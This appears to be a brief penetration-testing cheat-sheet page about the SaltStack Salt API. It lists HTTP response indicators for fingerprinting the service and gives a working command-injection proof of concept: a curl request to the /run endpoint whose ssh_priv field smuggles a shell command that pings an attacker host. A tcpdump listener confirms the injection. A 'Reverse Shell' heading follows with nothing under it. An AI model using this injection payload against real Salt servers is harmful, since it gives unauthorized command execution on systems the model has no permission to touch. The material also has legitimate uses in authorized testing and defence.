SaltStack
Salt API Indicators
HTTP/1.1 200 OK
Server: nginx/1.16.1
Content-Type: application/json
Allow: GET, HEAD, POST
Access-Control-Allow-Origin: *
X-Upstream: salt-api/3000-1http://TARGET:8000/ssh
404 Not Found
The path '/ssh' was not found.
Powered by CherryPy 5.6.0Salt API Command Injection
sudo tcpdump -i tun0 icmp
curl -i http://TARGET:8000/run \
-H "Content-type: application/json" \
-d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"| /usr/bin/ping -c 4 ATTACKER_IP #"}'Reverse Shell
References
Last updated